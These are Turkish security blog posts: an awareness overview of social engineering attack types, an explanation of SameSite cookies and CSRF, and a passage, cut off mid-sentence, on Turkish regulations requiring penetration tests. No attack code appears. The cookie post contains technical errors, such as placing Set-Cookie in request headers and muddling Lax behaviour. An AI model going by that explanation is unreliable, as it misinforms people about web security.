</div><div><b><span face=""Calibri",sans-serif" lang="TR" style="font-size: 16pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;">Sosyal Mühendislik Türleri</span></b></div><div><span face="Calibri, sans-serif"><span style="font-size: 21.3333px;"><b><br /></b></span></span><b><span face=""Calibri",sans-serif" lang="TR" style="font-size: 16pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-uT5y5cEv9qc/X3HBYlfTN5I/AAAAAAAAAGc/iXP9BhujDdI_84Vcoq05Jl51tE8ZDZekQCNcBGAsYHQ/s2048/20630.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="1736" data-original-width="2048" height="250" src="https://1.bp.blogspot.com/-uT5y5cEv9qc/X3HBYlfTN5I/AAAAAAAAAGc/iXP9BhujDdI_84Vcoq05Jl51tE8ZDZekQCNcBGAsYHQ/w295-h250/20630.jpg" width="295" /></a></div></span></b><p class="MsoNormal" style="background: white; line-height: normal; margin-bottom: 15pt; text-align: justify; vertical-align: baseline;"><b><span lang="TR" style="font-size: 12pt;">Sosyal mühendislik</span></b><span lang="TR" style="font-size: 12pt;"> saldırılarında oldukça fazla manipüle etme teknikleri
bulunmaktadır. Bireysel ve kurumsal kullanıcılar açısından sosyal
mühendislik saldırıları oldukça tehlikeli olduğu için en azından herkes sosyal
mühendislik saldırı türlerini okuyarak nerelerden kandırılabilecekleri
hakkında fikir sahibi olmaları gerekmektedir.</span><span lang="TR" style="font-size: 12pt; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;"><o:p></o:p></span></p>
<p class="MsoNormal" style="background: white; line-height: normal; margin-bottom: 15pt; text-align: justify; vertical-align: baseline;"><span lang="TR" style="font-size: 12pt;"> Aşağıda bu saldırı
türlerinden en çok karşılaşılanlarına örnekler verilmiştir.</span></p><p class="MsoNormal" style="background: white; line-height: normal; margin-bottom: 15pt; text-align: justify; vertical-align: baseline;"><br /></p><p class="MsoNormal" style="background: white; line-height: normal; margin-bottom: 15pt; text-align: justify; vertical-align: baseline;"><br /></p><p class="MsoNormal" style="margin-left: 18pt; text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%;">1. <u>Yemleme (Baiting)<o:p></o:p></u></span></p><p class="MsoNormal" style="background: white; line-height: normal; margin-bottom: 15pt; text-align: justify; vertical-align: baseline;">
</p><p class="MsoNormal" style="margin-left: 54pt; text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Baiting, hem fiziksel hem sanal bir saldırı türüdür. Saldırganlar kurbanı
bir ürünün cazibesiyle mantıklarını devre dışı bırakıp güvensiz bir eylem
yapmaya iterler. Örneğin bir kafede kurbana yakın bir konuma üzerinde
“Şifrelerim” yazan fakat içinde kötü amaçlı bir yazılım yerleştirdiğimiz CD
bırakmak gibi. Bu şekilde CD’yi bilgisayarına takan kurban için iş işten geçmiş
olur. </span></p><p class="MsoNormal" style="margin-left: 18pt; text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%;">2. <u>Oltalama (Phishing)<o:p></o:p></u></span></p><p class="MsoNormal" style="background: white; line-height: normal; margin-bottom: 15pt; text-align: justify; vertical-align: baseline;">
</p><p class="MsoNormal" style="margin-left: 54pt; text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Phishing saldırılarında, saldırganlar genellikle kurbanın aşina olduğu
güvenilir bir kaynaktan (Google, Instagram, Youtube vb.) iletişim sağlıyormuş
gibi davranarak gerçekliği taklit ederler. Bu saldırı türü çoğunlukla e-posta
ile gerçekleşmekte olup genellikle kurbandan finansal, kişisel ve oturum
bilgilerini paylaşması üzerine kuruludur. Her zaman kullandığınız ve güvendiğiniz
bir sosyal mecranın orijinal ismine çok benzer bir alan adı ile sizlere e-posta
atarak oturum bilgilerinizi ele geçirmesi phishing saldırılarına bir örnektir.</span></p><p class="MsoNormal" style="margin-left: 18pt; text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%;">3. <u>Korkutma (Scareware)<o:p></o:p></u></span></p><p class="MsoNormal" style="background: white; line-height: normal; margin-bottom: 15pt; text-align: justify; vertical-align: baseline;">
</p><p class="MsoNormal" style="margin-left: 54pt; text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Scareware saldırı türünde, saldırganların asıl amacı hayali tehlikeler ile
kurbanı korkutup bu korku hissinden yararlanarak aslında yapmaması gereken
şeyleri yapmasını sağlamaktır. Örneğin bir kurban cihazında virüs olduğuna
inandırılırsa belli bir miktar ödeme yaparak bu virüsün kaldırılabileceğine de
inandırılabilir bu şekilde ödeme bilgileri ele geçirilebilir veyahut
bilgisayarına bu virüsten kurtulması için kuracağı anti virüs görünümlü bir
program yerine kötücül bir yazılım yüklenebilir.</span></p><p class="MsoNormal" style="margin-left: 18pt; text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%;">4. <u>Sahne Senaryo Uydurmak (Pretexting)<o:p></o:p></u></span></p><p class="MsoNormal" style="background: white; line-height: normal; margin-bottom: 15pt; text-align: justify; vertical-align: baseline;">
</p><p class="MsoNormal" style="margin-left: 54pt; text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Pretexting, kurban üzerinde gözlem yapıp sahte senaryolar oluşturarak
iletişim kurmak üzerine kurulu bir saldırı türüdür. Çoğunlukla telefon
üzerinden ya da birebir iletişim ile gerçekleştirilir. Saldırgan kurban
hakkında bilgi topladıktan sonra bu bilgilere uygun bir senaryo oluşturur ve
kurbanla iletişimde kalarak güven duygusu oluşturulur. En sonunda bu güven
duygusu üzerine kurulmuş ilişkide öğrenilmek istenen bilgiler kurbandan alınmış
olur. </span></p><p class="MsoNormal" style="margin-left: 18pt; text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%;">5. <u>Hedefli Oltalama (Spear Phishing)<o:p></o:p></u></span></p><p class="MsoNormal" style="background: white; line-height: normal; margin-bottom: 15pt; text-align: justify; vertical-align: baseline;">
</p><p class="MsoNormal" style="margin-left: 54pt; text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Spear phishing saldırı türünde saldırganlar hedef odaklı çalışmaktadırlar.
Burada hedef bir kişi olabilmekte ya da bir kurumun tüm çalışanları da
olabilmektedir. Saldırgan bu saldırıda kurbanları hakkında bilgi (genellikle
sosyal medyadan) toplamaktadır. Yeterli bilgiye ulaştıktan sonra kurban için
tanıdık, güvenilir gözükecek bir e-posta atılmaktadır. Ve bu yollarla kişisel
bilgiler ele geçirilmektedir. Spear phishing saldırıları oldukça fazla
kullanılan ve başarı oranı yüksek bir saldırı çeşididir.</span></p><p class="MsoNormal" style="margin-left: 18pt; text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%;">6. <u>Yakın Takip (Tailgating)<o:p></o:p></u></span></p><p class="MsoNormal" style="background: white; line-height: normal; margin-bottom: 15pt; text-align: justify; vertical-align: baseline;">
</p><p class="MsoNormal" style="margin-left: 54pt; text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Tailgating, güvenli ve halka açık olmayan bir alana erişebilmek için
yapılan fiziksel bir saldırı türüdür. Bu saldırılar genellikle firmanın bir
çalışanı taklit edilerek ve olabildiğince rahat olup o ortama aitmiş hissiyatı
yaratılarak yapılmaktadır. Örneğin sunucu odasına girmeye çalışan bir
saldırgan, elleri dolu bir şekilde oranın çalışanıymış gibi davranıp odaya
giren yetkili birinin hemen arkasından yürüyebilir. Kapıyı açıp içeri girmeye
çalışan yetkili kişiye, kartını masada unuttuğunu söyleyip hemen ardından odaya
girerek ise gerçekte yapmak istediğine ulaşabilmektedir. Bu yüzden kurumlarda
yetki gerektiren odalara girilirken mutlaka kimlik olması yükümlülüğü konusunda
çalışanlar uyarılmalıdır.</span></p><p class="MsoNormal" style="margin-left: 18pt; text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%;">7. <u>Kimliğe Bürünme (Impersonating)<o:p></o:p></u></span></p><p class="MsoNormal" style="background: white; line-height: normal; margin-bottom: 15pt; text-align: justify; vertical-align: baseline;">
</p><p class="MsoNormal" style="margin-left: 54pt; text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Impersonating saldırılarında saldırgan kurbandan bilgi alabilmek için,
kurbanın tanıdığı veya kurbandan herhangi bir talepte bulunabilecek yetkili bir
kişi gibi davranmaktadır. Burada saldırganın taklit ettiği kişi firmanın
yetkili bir yöneticisi, polis gibi kişiler olabilmektedir. Bu şekilde kurban
denileni yapma eğilimini göstermeye bir nevi zorlanır.</span></p><p class="MsoNormal" style="margin-left: 18pt; text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%;">8. <u>Quid Pro Quo<o:p></o:p></u></span></p><p class="MsoNormal" style="background: white; line-height: normal; margin-bottom: 15pt; text-align: justify; vertical-align: baseline;">
</p><p class="MsoNormal" style="margin-left: 54pt; text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Quid pro quo saldırı türünde saldırganlar, bir şey karşılığında bir şey
sunarlar. Bu saldırıda saldırgan erişim izni karşılığında kurbana bir hizmet
teklif eder. Mesela bir deney yaptığını söyleyerek oturum bilgileri
karşılığında bir hediye çeki teklif eder. Sadece firmalar için değil günlük
hayatımızda da karşımıza oldukça fazla çıkan bir saldırı türüdür fakat fark edilmesi
diğer türlere göre daha yüksektir.</span><b><span lang="TR" style="font-size: 16pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;"><o:p></o:p></span></b></p><p class="MsoNormal" style="background: white; line-height: normal; margin-bottom: 15pt; text-align: justify; vertical-align: baseline;"><br /></p></div></div><div class="separator"><p></p></div><p class="MsoNormal" style="text-align: justify;"><span lang="TR"> </span><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;"><o:p></o:p></span></p><p></p>Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-67511660848123685242020-09-23T17:10:00.002+03:002020-09-23T17:32:13.556+03:00Çerezler Gerçekten Ne Kadar Tehlikeli ?<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-DnrqxyvClm4/X2tW7v4PVSI/AAAAAAAAAAk/KYvF3tZRW4MYLr1Lq1a2YqbgyXJefovIgCLcBGAsYHQ/s780/blog_cookies.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="400" data-original-width="780" height="281" src="https://1.bp.blogspot.com/-DnrqxyvClm4/X2tW7v4PVSI/AAAAAAAAAAk/KYvF3tZRW4MYLr1Lq1a2YqbgyXJefovIgCLcBGAsYHQ/w548-h281/blog_cookies.png" width="548" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: justify;"><span style="text-align: left;"><p class="p3" style="font-family: Helvetica; font-size: 12px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; text-align: justify;">SameSite Cookie’den bahsetmeden önce daha iyi anlaşılması için HTTP protokolü ve cookie’nin ne olduğundan kısaca bahsedebiliriz. <b>HTTP protokolü</b>, web üzerindeki uygulamalar ile iletişim kurmamızı sağlayan protokoldür ve çalışma mantığı basittir. HTTP protokolü <b>stateless</b> (durum bilgisini tutmayan) bir protokoldür bu yüzden de bazı işlemler yaparken: örneğin, bir siteye giriş işlemi gerçekleştirdikten sonra sayfayı yenilediğimizde web sitesi bizi tanımayacaktır. Bunu önlemek içinde cookie’ler geliştirilmiştir. Bir sitede gezinirken giden isteğin header kısmında “Set-Cookie” olarak tanımlanan bu parametre siteye ulaşmaya çalışıldığında karşı tarafa gönderilir ve bu sayede site tarafından tanınmış oluruz.</p><p class="p3" style="font-family: Helvetica; font-size: 12px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; text-align: justify;">Tarayıcılara eklenen SameSite Cookie özelliği de cookie’lerin 3. taraflardan kaynaklanan istekler ile bizim domainimiz dışındaki başka bir domaine ait istekler ile gönderilip gönderilmeyeceğini belirlemek için kullanılmaktadır.</p><p class="p4" style="font-family: Helvetica; font-size: 12px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px; text-align: justify;"><br /></p><p class="p3" style="font-family: Helvetica; font-size: 12px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; text-align: justify;">SameSite Cookie özelliği strict, lax ve none olmak üzere 3 şekilde set edilebilmektedir;</p><p class="p5" style="font-family: Helvetica; font-size: 12px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px 0px 0px 36px; text-align: justify;">•<span class="Apple-tab-span" style="white-space: pre;"> </span><b>Strict</b>: SameSite Cookie özelliğinin strict olarak tanımlanması, farklı bir site üzerinden yapılan istekte cookie’lerin gönderilmeyeceğini belirtmektedir.</p><p class="p5" style="font-family: Helvetica; font-size: 12px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px 0px 0px 36px; text-align: justify;">•<span class="Apple-tab-span" style="white-space: pre;"> </span><b>None</b>: SameSite Cookie none olarak tanımlanırsa, tüm bağlantılar tarafından cookie’lerin gönderileceği anlamına gelmektedir.</p><p class="p5" style="font-family: Helvetica; font-size: 12px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px 0px 0px 36px; text-align: justify;">•<span class="Apple-tab-span" style="white-space: pre;"> </span><b>Lax</b>: SameSite Cookie’nin lax olarak tanımlanmasında ise diğer sayfalar yani 3.taraflar tarafından yapılan GET isteklerinde cookie’ler gönderilmektedir fakat kritik istekler olan <b>POST</b>, <b>PUT</b>, <b>DELETE</b> gibi kritik isteklerde cookie gönderilmesine izin verilmemektedir.</p><p class="p5" style="font-family: Helvetica; font-size: 12px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px 0px 0px 36px; text-align: justify;"><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-42Kgk3uwiJg/X2tWRHQ6RaI/AAAAAAAAAAM/-xBGHBShTv0TmLvNPwLFf0zYPtlz3n-qQCLcBGAsYHQ/s1608/samesite.png" style="font-family: Times; font-size: medium; margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="852" data-original-width="1608" height="271" src="https://1.bp.blogspot.com/-42Kgk3uwiJg/X2tWRHQ6RaI/AAAAAAAAAAM/-xBGHBShTv0TmLvNPwLFf0zYPtlz3n-qQCLcBGAsYHQ/w510-h271/samesite.png" width="510" /></a></div><p class="p6" style="font-family: Helvetica; font-size: 12px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px 0px 0px 36px; min-height: 14px; text-align: justify;"></p><p class="p3" style="font-family: Helvetica; font-size: 12px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; text-align: justify;">Daha iyi açıklamak için şöyle bir örnek verebiliriz. <b>deneme.com/index.html</b> adında bir sayfa oluşturulup, içeriğine <img src=google.com/samesite.png> şeklinde bir resim tag’i eklenilsin. Bu siteye URL üzerinden <b>deneme.com/index.html </b>yazarak gidilirse ve SameSite Cookie <b>none</b> olarak tanımlanmışsa cookie’ye istek gönderilecektir. Cookie, <b>lax</b> veya <b>strict</b> olarak tanımlanmış ise cookie iletimi olmayacaktır. Fakat URL kısmına <b>google.com/samesite.png </b>yazılırsa bu sefer <b>lax</b> olarak set edilen cookie de gönderilecektir. Bunun sebebi ise img tag’i GET isteği yollamaktadır fakat bu GET isteği URL üzerinde bir değişiklik yaratmadığı için cookie gönderilmektedir.</p><p class="p4" style="font-family: Helvetica; font-size: 12px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px; text-align: justify;"><br /></p><p class="p3" style="font-family: Helvetica; font-size: 12px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; text-align: justify;">Bu kısımda görüldüğü gibi SameSite Cookie’yi <b>strict</b> olarak tanımlanırsa hiçbir zaman cookie gönderilmeyecektir ve cookie iletimi güvenli olacaktır. Fakat bu da bazı sorunları beraberinde getirmektedir.<span class="Apple-converted-space"> </span></p><p class="p4" style="font-family: Helvetica; font-size: 12px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px; text-align: justify;"><br /></p><p class="p3" style="font-family: Helvetica; font-size: 12px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; text-align: justify;">Header üzerinde örnek bir cookie tanımı yapılması;</p><p class="p3" style="font-family: Helvetica; font-size: 12px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; text-align: justify;"><b>“Set-Cookie: aspCookie=deneme; SameSite=Lax;”</b></p><p class="p3" style="font-family: Helvetica; font-size: 12px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; text-align: justify;">Header üzerinde yukarıdaki şekilde SameSite Cookie tanımlanabilmektedir.</p><p class="p4" style="font-family: Helvetica; font-size: 12px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px; text-align: justify;"><br /></p><p class="p3" style="font-family: Helvetica; font-size: 12px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; text-align: justify;">SameSite Cookie’nin çıkmasının sebebi <b>CSRF</b>’in (Cross Site Request Forgery, siteler arası istek sahteciliği) önüne geçmektedir. Örnek olarak; <b>satınal.com</b> tarzında bir siteye giriş yapıldığında, giriş yapan kullanıcıya bir cookie tanımlanmaktadır. Sonrasında bu kullanıcı farklı bir sekmede <b>zararlı.com</b>’a giriş yaparken bu site <b>satınal.com</b> üzerinden yeni parola tanımlama işlemi için istek atabilmektedir. SameSite Cookie özelliği ise burada devreye girmektedir. Yapılan istek için cookie gönderilmeyeceğinden parola değiştirme işlemi de gerçekleşmeyecektir.</p><p class="p4" style="font-family: Helvetica; font-size: 12px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px; text-align: justify;"><br /></p><p class="p3" style="font-family: Helvetica; font-size: 12px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; text-align: justify;">Peki neden tüm SameSite Cookieler <b>strict</b> ile set edilmemektedir? Aslında bu noktada <b>bankalar</b> gibi önemli veri saklayan ve diğer siteler ile iletişim kurma gereksinimi olmayan yerlerde <b>strict</b> kullanılabilmektedir. Fakat Twitter gibi bir site <b>strict</b> ile set edildiğinde bazı problemler ortaya çıkmaktadır. Örneğin bir kullanıcı <b>blog.btyon.com.tr</b> üzerinden okuduğu bir yazıyı çok beğenip bunu Twitter üzerinden paylaşmak isteyebilmektedir. Fakat kullanıcı bu yazıyı paylaş butonuna bastığı zaman tekrardan Twitter’a giriş yapması gerekir. Bu durumun önüne geçmek adına SameSite Cookie <b>lax</b> olarak tanımlanmaktadır. Bu durum bir siteye Twitter ile giriş yapılmak istendiğinde de geçerlidir.</p><p class="p4" style="font-family: Helvetica; font-size: 12px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px; text-align: justify;"><br /></p><p class="p3" style="font-family: Helvetica; font-size: 12px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; text-align: justify;">Kısaca SameSite Cookie sayesinde CSRF zafiyeti olabildiğince az seviyeye indirilmekte ve cookie’ler güvenli bir şekilde gönderilmektedir.</p></span></div>Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-38339758529042482132020-05-07T11:28:00.000+03:002020-05-07T11:28:12.677+03:00YASAL DÜZENLEMELERDE SIZMA TESTİ GEREKLİLİĞİ<br />
<div class="MsoNormal" style="text-align: right;">
<b style="background-color: white; color: #222222; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13.2px;">Sinem Varol, Danışman</b></div>
<div class="MsoNormal">
Sızma testleri bir kuruluşun bilgi sistemleri ve çalışan
kaynaklı zafiyetlerini açığa çıkarmak amacıyla yapılan çalışmalardır. Sızma
testi ile saldırılar gerçekleşmeden önce zafiyetlerin (açıklıkların) farkında olunması
ve bunların kapatılmasıyla sistemlerin daha güvenli bir hale getirilmesi
amaçlanır. <o:p></o:p></div>
<div class="MsoNormal">
İçinde bulunduğumuz çağda teknolojinin güncel durumu dikkate
alındığında ve saldırganların teknik bilgisinin üst seviyede olması gerekmediği
göz önüne alınırsa her geçen gün bireyler ve kuruluşlar için bilgilerinin
güvenliği daha büyük tehlike altındadır.<o:p></o:p></div>
<div class="MsoNormal">
Düzenli olarak sızma testi yaptırmak, olası açıklıkları
saldırganlar fark etmeden önce öğrenmek ve bu zafiyeti kapatarak olası bir
siber saldırıyı engellemek için proaktif bir tedbir niteliği taşımaktadır. Zafiyetler
için aksiyon alınmasıyla birlikte kuruluşun hassas verilerinin yetkisiz
kişilerin eline geçme ihtimali azalmış ve sistemlerindeki açıkların
kapatılmasıyla yetkisiz kişilerin istismarı önlenmiş olur. <o:p></o:p></div>
<div class="MsoNormal">
Sızma testleri kuruluşun isteği ve ihtiyacı doğrultusunda
gerçekleştirilebilir. Ancak bazı sektörlerde bilgi güvenliğinin kritik olması
sebebi ile düzenleyici kuruluşlar tarafından bu çalışma yükümlülük haline getirilmiştir.
<o:p></o:p></div>
<div class="MsoNormal">
Bu yazının devamında tebliğler ve yönetmeliklerde
belirtildiği üzere hangi kuruluşların sızma testi yaptırmaları gerektiği
açıklanmıştır.<o:p></o:p></div>
<h2>
Bankacılık Düzenleme ve Denetleme Kurumu<o:p></o:p></h2>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->14 Eylül 2007 tarihinde yayınlanan Bankalarda
Bilgi Sistemleri Yönetiminde Esas Alınacak İlkelere İlişkin Tebliğ mevduat
bankalarını, katılım bankalarını, kalkınma bankalarını ve yatırım bankalarını
kapsamaktadır. Bilgi sistemlerine ilişkin risk yönetimi bölümünde güvenlik
kontrol sürecinin tesis edilmesi ve yönetilmesi başlığında bağımsız ekiplere
düzenli aralıklarla sızma testi yaptırılması gerektiği belirtilmiştir. Aynı
zamanda internet bankacılığı bölümünde güvenlik kontrol sürecinin tesis
edilmesi ve yönetilmesi başlığı altında bağımsız ekiplere, en az yılda bir kez
olmak üzere, internet bankacılığı faaliyetleri kapsamındaki sistemler için
sızma testi yaptırılması gerekliliğine yer verilmiştir. Bu tebliğ 1 Temmuz 2020
tarihinde yürürlükten kalkacaktır.<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle">
Aynı zamanda, bu tebliğe istinaden
hazırlanan Bilgi Sistemlerine İlişkin Sızma Testleri Hakkında Genelge 24 Temmuz
2012 tarihinde yayınlanmıştır. Bu genelgede yapılacak olan sızma testlerinin
asgari olarak kapsamı aşağıda verilmiştir.<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->İletişim Altyapısı ve Aktif Cihazlar<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->DNS Servisleri<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Etki Alanı ve Kullanıcı Bilgisayarları<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->E-posta Servisleri<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Veri Tabanı Sistemleri<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Web Uygulamaları<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Mobil Uygulamalar<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Kablosuz Ağ Sistemleri<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->ATM Sistemleri<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Dağıtık Servis Dışı Bırakma Testleri<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Sosyal Mühendislik Testleri<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Kurum, Bankaların Bilgi Sistemleri ve Elektronik
Bankacılık Hizmetleri Hakkında Yönetmeliği 15 Mart 2020 tarihinde
